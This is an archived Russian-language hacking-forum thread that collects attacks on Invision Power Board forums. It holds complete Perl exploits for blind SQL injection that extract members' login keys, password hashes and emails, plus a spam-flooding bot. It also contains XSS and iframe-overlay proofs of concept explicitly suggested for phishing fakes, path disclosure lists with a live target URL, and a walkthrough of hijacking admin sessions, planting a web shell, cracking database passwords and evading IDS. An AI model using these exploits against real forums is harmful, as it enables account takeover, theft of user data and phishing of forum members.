ANTICHAT - [Обзор уязвимостей IPB]

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей IPB] (https://forum.antichat.xyz/showthread.php?t=89112)

ibProArcade <= v3.3.0 sql injection exploit

Автор: +toxa+

PHP код:


		
			
#!/usr/bin/perl 



## ibProArcade <= v3.3.0 sql injection exploit 

## (c)oded by 1dt.w0lf 

## RST/GHC 



##        THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE 

##                   KEEP IT PRIVATE 



use Tk; 

use Tk::BrowseEntry; 

use Tk::DialogBox; 

use LWP::UserAgent; 



BEGIN { 

if($^O eq 'MSWin32'){ 

require Win32::Console; 

Win32::Console::Free(); 

} 

} 



$mw = new MainWindow(title => "r57ibProArcade" ); 



$mw->geometry ( '420x310' ) ; 

$mw->resizable(0,0); 



$mw->Label(-text => '!', -font => '{Webdings} 22')->pack(); 

$mw->Label(-text => 'ibProArcade sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); 

$mw->Label(-text => '')->pack(); 



$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; 

$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; 



$url = 'http://127.0.0.1/ipb216/index.php'; 

$user_id = '1'; 

$prefix = 'ibf_'; 

$column = 'member_login_key'; 

$report = ''; 

$true = 0; 

$false = 0; 



$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; 

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ; 



$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; 

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; 



$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; 

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; 



$fright->Label( -text => ' ')->pack(); 

$fleft->Label( -text => ' ')->pack(); 



$fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ; 

$fright->Label( -text => ' ')->pack(); 



$fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; 

$b = $fright->BrowseEntry( -relief => "groove", -variable => $column, -font => '{Verdana} 8'); 

$b->insert("end", "member_login_key"); 

$b->insert("end", "name"); 

$b->insert("end", "ip_address"); 

$b->insert("end", "legacy_password"); 

$b->insert("end", "email"); 

$b->pack( -side => "top" , -anchor => 'w' ); 



$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; 

$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $report) ->pack ( -side => "top" , -anchor => 'w' ) ; 





$fright->Label( -text => ' ')->pack(); 



$fright->Button(-text    => 'Test forum vulnerability', 

                -relief => "groove", 

                -width => '30', 

                -font => '{Verdana} 8 bold', 

                -activeforeground => 'red', 

                -command => &test_vuln 

               )->pack(); 



$fright->Button(-text    => 'Get database tables prefix', 

                -relief => "groove", 

                -width => '30', 

                -font => '{Verdana} 8 bold', 

                -activeforeground => 'red', 

                -command => &get_prefix 

               )->pack(); 



$fright->Button(-text    => 'Get data from database', 

                -relief => "groove", 

                -width => '30', 

                -font => '{Verdana} 8 bold', 

                -activeforeground => 'red', 

                -command => &get_data 

               )->pack(); 







$fleft->Label( -text => ' ')->pack(); 

$fleft->Label( -text => '+++ PRIV8 +++', -font => '{Verdana} 7')->pack(); 

$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack(); 

$fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack(); 



MainLoop(); 



sub get_data() 

{ 

$true = &get_true(); 



$report = '';   

$s_num=1; 

while(($chr = &found(0,255))!=0){ 

$report .= chr($chr); 

$mw->update(); 

$s_num++; 

} 

if(length($report) > 0) { &report('That\'s all ;)'); } 

else { &report('Can\'t get data from database'); } 



} 



sub test_vuln() 

{ 

$InfoWindow=$mw->DialogBox(-title   => 'test forum vulnerability', -buttons => ["OK"]); 

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; 

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; 

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; 



$true = &get_true(); 

$false = &get_false(); 



if($true != $false) { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } 

else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; } 



$InfoWindow->Show(); 

$InfoWindow->destroy; 

} 



sub get_true() 

{ 

$xpl = LWP::UserAgent->new( ) or die; 

$res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=1))"); 

if($res->as_string =~ /g=(d+)" target="hiddenframe"><img src="./arcade/images/addfav.gif"/) { $rep = $1; } 

return $rep; 

} 



sub get_false() 

{ 

$xpl = LWP::UserAgent->new( ) or die; 

$res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=2))"); 

if($res->as_string =~ /g=(\d+)" target="hiddenframe"><img src=".\/arcade\/images\/addfav.gif"/) { $rep = $1; } 

return $rep; 

} 

  

sub get_prefix() 

{ 

$InfoWindow=$mw->DialogBox(-title   => 'get database tables prefix', -buttons => ["OK"]); 

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; 

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; 

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; 

$xpl = LWP::UserAgent->new( ) or die; 

$res = $xpl->get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=r57r0x"); 

if($res->is_success) 

 { 

 $rep = ''; 

 if($res->as_string =~ /from (.*)games_list/) 

 { 

 $prefix = $1; 

 $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack; 

 } 

 else 

 { 

 $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } 

 } 

else 

 { 

 $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; 

 $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; 

 } 

$InfoWindow->Show(); 

$InfoWindow->destroy;   

} 



sub found($$) 

 { 

 my $fmin = $_[0]; 

 my $fmax = $_[1]; 

 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } 

  

 $r = int($fmax - ($fmax-$fmin)/2); 

 $check = " BETWEEN $r AND $fmax"; 

 if ( &check($check) ) { &found($r,$fmax); } 

 else { &found($fmin,$r); } 

 } 

  

sub crack($$) 

 { 

 my $cmin = $_[0]; 

 my $cmax = $_[1]; 

 $i = $cmin; 

 while ($i<$cmax) 

  { 

  $crcheck = "=$i"; 

  if ( &check($crcheck) ) { return $i; } 

  $i++; 

  } 

 $i = 0; 

 return $i; 

 } 

  

sub check($) 

 { 

 $n++; 

 $rep = ''; 

 $ccheck = $_[0]; 

 $xpl = LWP::UserAgent->new( ) or die; 

 $res = $xpl->get($url.'?autocom=arcade',cookie=>'g_display_sort=added;g_display_order=,(-gid*(SELECT 1 FROM '.$prefix.'members WHERE (id='.$user_id.' AND ascii(substring('.$column.','.$s_num.',1))'.$cchec  k.') LIMIT 1)) LIMIT 1'); 

 if($res->as_string =~ /g=(d+)" target="hiddenframe"><img src="./arcade/images/addfav.gif"/) { $rep = $1; } 

 if($rep == $true) { return 1; } 

 else { return 0; } 

 } 

  

sub report() 

{ 

$InfoWindow=$mw->DialogBox(-title   => 'Report', -buttons => ["OK"]); 

$InfoWindow->add('Label', -text => $_[0], -font => '{Verdana} 7')->pack; 

$InfoWindow->Show(); 

$InfoWindow->destroy; 

}

PS Материал востановлен
Дата публикации: 30.01.2008, 21:01
Автор +toxa+

Invision Power Board <=v2.3.4 BBCodes XSS

Автор: +toxa+

добавленный кодес в class_bbcode_core.php

PHP код:


		
			
 ...................... 

                            $match[ $_content ][$i] = preg_replace( '#(style)=#is', "$1=", $match[ $_content ][$i] );     

                            $match[ $_option ][$i] = preg_replace( '#(style)=#is', "$1=", $match[ $_option ][$i] ); 

.......................         

        //----------------------------------------- 

        // Don't let emos in URL.. 

        //----------------------------------------- 

         

        if ( $this->parse_smilies ) 

        { 

            if ( count( $this->ipsclass->cache['emoticons'] ) > 0 ) 

            { 

                foreach( $this->ipsclass->cache['emoticons'] as $row) 

                { 

                    $code    = $row['typed']; 

                    $code    = str_replace( '<', '&lt;', str_replace( '>', '&gt;', $code ) );     

                     

                    if( strpos( $url, $code ) ) 

                    { 

                        $new  = ''; 

                         

                        for( $i=0; $i<strlen($code); $i++ ) 

                        { 

                            //print dechex(ord($code{$i})).'<Br>'; 

                            $new .= '%' . dechex(ord($code{$i})); 

                        } 

                         

                        $url = str_replace( $code, $new, $url ); 

                    } 

                } 

                 

                // Using the :/ smiley 

                $url = str_replace( 'http%3a%2f', 'http:/', $url ); 

            } 

        } 

         

        $url = htmlspecialchars($url); 

.......................         

        //----------------------------------------- 

        // Don't let emos in URL.. 

        //----------------------------------------- 

         

        if ( $this->parse_smilies ) 

        { 

            if ( count( $this->ipsclass->cache['emoticons'] ) > 0 ) 

            { 

                foreach( $this->ipsclass->cache['emoticons'] as $row) 

                { 

                    $code    = $row['typed']; 

                    $code    = str_replace( '<', '&lt;', str_replace( '>', '&gt;', $code ) );     

                     

                    if( strpos( $url['html'], $code ) ) 

                    { 

                        $new  = ''; 

                         

                        for( $i=0; $i<strlen($code); $i++ ) 

                        { 

                            //print dechex(ord($code{$i})).'<Br>'; 

                            $new .= '%' . dechex(ord($code{$i})); 

                        } 

                         

                        $url['html'] = str_replace( $code, $new, $url['html'] ); 

                    } 

                } 

                 

                // Using the :/ smiley 

                $url['html'] = str_replace( 'http%3a%2f', 'http:/', $url['html'] ); 

            } 

        } 

         

         

            $url['html'] = htmlspecialchars( $url['html'] ); 

......................

кому интересно, думаете)

PS Материал востановлен
Дата публикации: 22.02.2008, 22:22
Автор +toxa+

XSS [Flash] in IPB v1.3, 2.1.5 и 2.2.2

Автор: iddqd

Vulnerable: 1.x и 2.x (тестировалось на Invision Power Board v1.3, 2.1.5 и 2.2.2).

XSS [Flash]

Из-за отсутствия защиты от исполнения JavaScript кода из flash, при включенной
поддержке флеша в сообщениях, атакующий может внедрить ссылку на специальный
флеш-файл в тело сообщения и атаковать всех участников форума, которые просмотрят
тему с данным сообщением. Атака может быть проведена через публикацию флешки в
сообщении на форуме, или установки её в качестве аватора.

PoC:

Цитата:

[flash=1,1]http://site/flash.swf[/flash]

Fix:
Для исправления данной уязвимости нужно установить свойство флеш-объекта
allowscriptaccess в "never".

PS Материал востановлен
Дата публикации: 08.03.2008, 15:14
Автор iddqd

IPB <=2.0.3 SQL-inj Exploit (c) h4cky0u

Автор: +toxa+

heres another sick xploit for 2.0.3 again coded by jamey224. Usally works, except for a few boards that are patched.Enjoy! (c) h4cky0u
http://h4cky0u.org/viewtopic.php?f=2&t=6110

PHP код:


		
			
 use LWP::UserAgent; 



   $ua = new LWP::UserAgent; 

   $ua->agent("Mosiac 1.0" . $ua->agent); 



if (!$ARGV[0]) {$ARGV[0] = '';} 

if (!$ARGV[3]) {$ARGV[3] = '';} 



my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; 

my $user = $ARGV[1];   # userid to jack 

my $iver = $ARGV[2];   # version 1 or 2 

my $cpre = $ARGV[3];   # cookie prefix 

my $dbug = $ARGV[4];   # debug? 



if (!$ARGV[2]) 

{ 

        print "The type of the file system is NTFS.\n\n"; 

        print "Exploit C0d3d By Jamey2244\n"; 

        print "Yes I know I'm g00d\n"; 

        print "LeTS g0!!!\n"; 

        exit; 

} 



my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); 



my $outputs = ''; 



for( $i=1; $i < 33; $i++ ) 

{ 

        for( $j=0; $j < 16; $j++ ) 

        { 

                my $current = $charset[$j]; 

            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2  527$current%2527)/*" : 

"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i  ,1)%3d%2527$current%2527)/*"; 

                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); 

                my $res = $ua->get($path, @cookie); 



                # If we get a valid sql request then this 

                # does not appear anywhere in the sources 

                $pattern = '<title>(.*)Log In(.*)</title>'; 



                $_ = $res->content; 



                if ($dbug) { print }; 



                if ( !(/$pattern/) ) 

                { 

                        $outputs .= $current; 

                        print "$current\n"; 

                    last; 

                } 



        } 

  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     } 

} 

print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; 

exit;

PS Материал востановлен
Дата публикации: 16.03.2008, 16:02
Автор +toxa+

Invision Power Board <=2.3.x iFrame Vulnerability

Автор: iddqd

1)Регистрируемся
2)Заходим в свой профиль
3)Изменяем подпись(html включен):

PHP код:


		
			
<html> 

<head> 

<title>Заголовок</title> 

</head> 

<body> 

<div id="iFrame1" style="position:absolute; left:0px; top:0px; z-index:0"> 

<iframe name="iFrame1" width=1024 height=3186 src="http://адрес Вашей страницы.html" scrolling="no" 

frameborder="0"></iframe> 

</div> 

</body> 

</html>

4)Постим сообщение- страница форума перекрывается Вашей страницей.
Можно использовать для фейков.

PS Материал востановлен
Дата публикации: 27.03.2008, 19:01
Автор iddqd

Invision Power Board <=2.3.5 Active XSS

Автор: %00

Invision Power Board <=2.3.5

Active XSS

Работает в ie
Не работает в opera

1) создаем файл any.html внути него <script>alert()</script>
2) содаем пост с аттачем any.html

В версиях ниже 2.3.х может не работать...

PS Материал востановлен
Дата публикации: 20.05.2008, 15:25
Автор %00

Full path disclosure:

Автор: ettee

Full path disclosure:

Цитата:

ips_kernel/PEAR/Text/Diff3.php
ips_kernel/PEAR/Text/Diff/Renderer/inline.php
ips_kernel/class_db.php
ips_kernel/class_db_mysql.php
ips_kernel/class_xml.php
sources/sql/mysql_admin_queries.php
sources/sql/mysql_extra_queries.php
sources/sql/mysql_queries.php
sources/sql/mysql_subsm_queries.php
sources/loginauth/ldap/auth.php
sources/loginauth/convert/auth.php.bak
sources/loginauth/external/auth.php
sources/loginauth/ldap/auth.php
sources/classes/post/class_post_edit.php
sources/classes/post/class_post_new.php
sources/classes/post/class_post_reply.php
sources/classes/post/class_post.php
sources/classes/editor/class_editor_std.php
sources/classes/editor/class_editor_rte.php
sources/acp_loaders/acp_pages_components.php
sources/classes/bbcode/class_bbcode_legacy.php
sources/classes/bbcode/class_bbcode.php
sources/lib/search_mysql_man.php
sources/lib/search_mysql_ftext.php
sources/lib/func_usercp.php
sources/lib/search_mysql_ftext.php
sources/lib/search_mysql_man.php
sources/action_admin/member.php
sources/action_admin/paysubscriptions.php
sources/action_public/login.php
sources/action_public/messenger.php
sources/action_public/moderate.php
sources/action_public/paysubscriptions.php
sources/action_public/register.php
sources/action_public/search.php
sources/action_public/topics.php
sources/action_public/usercp.php
sources/components_acp/registration_DEPR.php
sources/handlers/han_paysubscriptions.php

Version detection:

Цитата:

jscripts/ipb_register.js
jscripts/ipb_global.js
jscripts/ips_profile_portal.js

PS Материал востановлен
Дата публикации: 02.06.2008, 21:32
Автор ettee

Автор: baltazar

ФЛудит как постами так и топиками,проверено на 2.1.7

PHP код:


		
			
#---------------------------- 

#   this programe has been  # 

#   created by NikTrix-Souvico       # 

#   [ 'HellSoft' ] for      # 

#   Flooding IPB Forums     # 

#---------------------------- 

 

#!/usr/bin/perl -w 

use strict; 

use LWP::UserAgent; 

use HTTP::Cookies; 

 

#Variables 

my  $url        =   undef; 

my  $login      =   undef; 

my  $UserName   =   undef; 

my  $PassWord   =   undef; 

my  $CookieDate =   1; 

my  $SID        =   undef; 

my  $SE         =   undef; 

my  $MSG        =   undef; 

 

#Prototype 

sub IPBFlood($); 

 

#Main 

print "\t\tWelcome to IPBFlood 0.1x By Souvik\t\t[ 'NikTrix' ]Team"; 

 

print "Url\t: ";chomp($url=); 

print "UserName\t: ";chomp($UserName=); 

print "Password\t: ";chomp($PassWord=); 

print "Start [to] End\t: ";chomp($SE=); 

print "Message\t: ";chomp($MSG=); 

 

my  $ua     =   LWP::UserAgent->new; 

$ua->agent("Mozilla/4.0"); 

my  $cj     =   HTTP::Cookies->new(file => "N/A" , autosave => 0); 

$ua->cookie_jar($cj); 

 

#-get SID 

my  $r      =   $ua->get($url); 

if($r->is_success){ 

    #Find SID ? 

    ($SID) = $r->content =~/\?s=(\w{32})&.*/i; 

    print "SID : $SID"; 

} 

 

#-Connecting ... 

$r          =   $ua->post($url.$login,[UserName=> $UserName ,PassWord => $PassWord ,CookieDate =>$CookieDate , s => $SID]); 

if($r->is_success){ 

    print "[+] Connected" if($r->content =~ /cliquez ici si vous ne souhaitez pas/gi); 

    my($Start , $End) = split(/-/,$SE); 

    foreach($Start..$End){ 

        IPBFlood($_); 

    } 

} 

 

#Subroutines 

sub IPBFlood($){ 

    my $Topic   =   shift; 

    my $get     =   $ua->get($url."s=$SID&showtopic=$Topic"); 

    if($get->is_success){ 

        #Get Subforum ID "f" : variable ! 

        if( my ($f) = $get->content =~/f=(\d{1,4})/ ){ 

            print "[-]Subforum ID : $f & Topic N : $Topic"; 

            #Get Post AuthKey for Subforum f=N° 

            $get    =   $ua->get($url."s=$SID&act=post&do=reply_post&f=$f&t=$Topic"); 

            #                          act=post&do=reply_post&f=56&t=43988 

            if($get->is_success){ 

                ##auth_key Ex :  

                my ( $auth_key ) = $get->content =~/auth_key.*(\w{32})/i; 

                #attach_post_key Ex :  

                my ( $attach_post_key ) = $get->content =~/attach_post_key.*(\w{32})/i; 

                print "[-]auth_key : $auth_key[-]attach_post_key : $attach_post_key"; 

 

 

                my %form =(st                 =>  0, 

                           act                =>  "Post", 

                           s                  =>  "$SID", 

                           f                  =>  "$f", 

                           auth_key           =>  "$auth_key", 

                           removeattachid     =>  "0", 

                           CODE               =>  "03", 

                           t                  =>  "$Topic", 

                           attach_post_key    =>  "$attach_post_key", 

                           parent_id          =>  "0", 

                           "ed-0_wysiwyg_used"=>  "0", 

                           "editor_ids%5B%5D" =>  "ed-0", 

                           Post               =>  "$MSG", 

                           enableemo          =>  "yes", 

                           enablesig          =>  "yes", 

                           iconid             =>  "0" 

                           ); 

                $r      =   $ua->post($url."s=$SID",\%form); 

                if($r->is_success){ 

                    print "Send success !" if( length($r->content)< 300); 

                } 

            } 

        } 

    } 

}

PS Материал востановлен
Дата публикации: 22.07.2008, 00:59
Автор baltazar

Раскрытие пути

Автор: Nightmarе

Раскрытие пути в модуле "галерея" в IPB 2.3.5:

index.php?automodule=gallery&req[]=

Пример:
http://www.obzvon.com/forums/index.php?automodule=gallery&req[]=

Тока щас нашёл, работает везде, возможно кому-то пригодится.

PS Материал востановлен
Дата публикации: 09.08.2008, 02:06
Автор Nightmarе

Invision Power Board <= 2.3.5 Multiple Vulnerabilities

Автор: Elekt

Invision Power Board <= 2.3.5

Multiple Vulnerabilities

http://acid-root.new.fr/?0:18
http://packetstormsecurity.org/filedesc/ipb235-multi.txt.html

Экспоит основывается на SQL-inj в параметре "name" файла "sources/action_public/xmlout.php"
и использует технологию классического посимвольного брута данных.
Особенность урленкода %2527 делает его независимым от magic_quotes.

/ipb235/index.php?s=&act=xmlout&do=check-display-name&name=%2527

Цитата:

IPS Driver Error
There appears to be an error with the database.
You can try to refresh the page by clicking here

В эксплоите предусмотрено три режима работы.

-attack 1

Через скуль получают сессию админа.
Из настроек извлекается инфа о привязке сессии к ip-address и browser.
Если таковая привязка имеется (включено по дефолту) и админ заходил не из под прокси - атака невозможна.
В ином случае - извлекаются ip-address и browser админа и производится попытка войти под админом.
В случае успешной попытки эксплоит прописывает веб-шелл в файл языка.

Вероятность успеха атаки мала, ибо:
~ сессия имет по дефолту привязку к айпи и браузеру
~ время жизни сессии скорее всего просрочено. придется караулить админа, либо спровоцировать его зайти в админку.

Сам процесс "ожидания" в эксплоите реализован в цикле - ожидание появления новой сессии.

Пример запуска эксплойта:
php ipb235-multi.txt -attack 1 -url http://www.ipb-235.com/forum/

-attack 2

Как ни удивительно - в сессии cookie *ipb_stronghold пользователя присутствует пароль к БД.
Используя атаку по словарю, эксплоит пытается сбрутить пароль к БД из хеша сессии.
Через скуль эксплоит получает имя текущего пользователя БД.

Необходима валидная учетная запись, либо куки со сниффера.
Вероятность успеха мала и зависит в большей мере от вашего словаря и рэндомности пароля.

Пример запуска эксплойта:
php ipb235-multi.txt -attack 2 -url http://www.ipb-235.com/forum/ -ip <ВАШ_IP> -dict passwd.txt -uname mynick -pwd password

Разложим алгоритм генерации сессии:

PHP код:


		
			
 $md5 = md5(trim($line).$this->p_sql_u); 

$md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5; 

$md5 = md5($md5);

Преобразуем к:

PHP код:


		
			
PHP код:

 md5(md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).md5($pass.$this->p_sql_u))

Тогда
~ если *member_id нашего юзера, например, 1745
~ если у нас ip, например, 192.168.5.235
~ если cookie *pass_hash, например, 12345678901234567890123456789012
~ если мы знаем заведомо\получили через SQL-inj имя текущего SQL-юзера к БД, например, sqladmin@localhost
Тогда:

PHP код:


		
			
md5(md5('1745-192-168-12345678901234567890123456789012'). md5($pass.'sqladmin'))

Посмотрел модули в PasswordPro - можно брутить пасс из него по маске.
Используем модуль md5(md5($salt).md5($pass))
Ставьте атаку по маске, например, как
?|?|?|?|?|?|?|?|sqladmin
где как видите в конце маски идет sql юзер БД.
Ну подмаску ?| (a-z) можете выбрать и другую, однако тройной мд5 будет аццки тормозить на широком диапазоне символов...

-attack 3

И наконец-то класическая добыча пароля пользователя + соль.
Встроенный в эксплоит брутфорс попробует перебрать найденный хеш по словарю,
хотя рекомендую перебирать чем-нить по шустрее.

php ipb235-multi.txt -attack 3 -url http://www.ipb-235.com/forum/ -dict passwd.txt

Реализован режим обхода IDS. Вобщем, автору DarkFig - большой респект.

Я немного оптимизировал код.
Максимальная скорость работы возросла в среднем в 2.5 раза.
На примере атаки #3 : оригинальному эксплоиту потребуется около 500 запросов для брута md5 хеша + соли.
Мой вариант для тойже задачи потребует не более 200
ver1.5
-----------------------
Сдесь аттач с программой :) (у кого права есть, поставьте, будте так добры )
-----------------------

PS Материал востановлен
Дата публикации: 30.08.2008, 10:50
Автор Elekt